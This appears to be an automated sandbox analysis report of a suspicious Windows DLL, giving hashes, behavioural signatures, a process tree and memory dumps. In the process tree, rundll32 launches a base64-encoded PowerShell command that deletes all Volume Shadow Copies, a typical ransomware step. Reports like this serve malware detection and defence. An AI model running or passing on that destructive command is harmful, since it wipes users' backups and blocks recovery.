Analysis

  • max time kernel
    118s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:40

General

  • Target

    fbb58016f40bf8e8f58b0362be03df6a2c99eb7e6756a1978037cc8c6fcf2896.dll

  • Size

    115KB

  • MD5

    5a793af84eae513aaa985bf8a161113d

  • SHA1

    b06c5837fbf61e4c4274fede1d5622746ffe3dad

  • SHA256

    fbb58016f40bf8e8f58b0362be03df6a2c99eb7e6756a1978037cc8c6fcf2896

  • SHA512

    0db511708c11b5991bb9d2f6ef69ede9577fd89175f5c2b89c36785d40d2775453e13d33c644a55d6380c0605f3a5a1cf4a77baf2c02cf59d2786a369fafe5a6

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fbb58016f40bf8e8f58b0362be03df6a2c99eb7e6756a1978037cc8c6fcf2896.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\fbb58016f40bf8e8f58b0362be03df6a2c99eb7e6756a1978037cc8c6fcf2896.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:592
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:980

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/592-55-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp
    Filesize

    8KB

  • memory/592-57-0x0000000002530000-0x0000000002532000-memory.dmp
    Filesize

    8KB

  • memory/592-58-0x0000000002532000-0x0000000002534000-memory.dmp
    Filesize

    8KB

  • memory/592-59-0x0000000002534000-0x0000000002537000-memory.dmp
    Filesize

    12KB

  • memory/592-56-0x000007FEF3790000-0x000007FEF42ED000-memory.dmp
    Filesize

    11.4MB

  • memory/592-60-0x000000000253B000-0x000000000255A000-memory.dmp
    Filesize

    124KB

  • memory/1532-54-0x00000000766D1000-0x00000000766D3000-memory.dmp
    Filesize

    8KB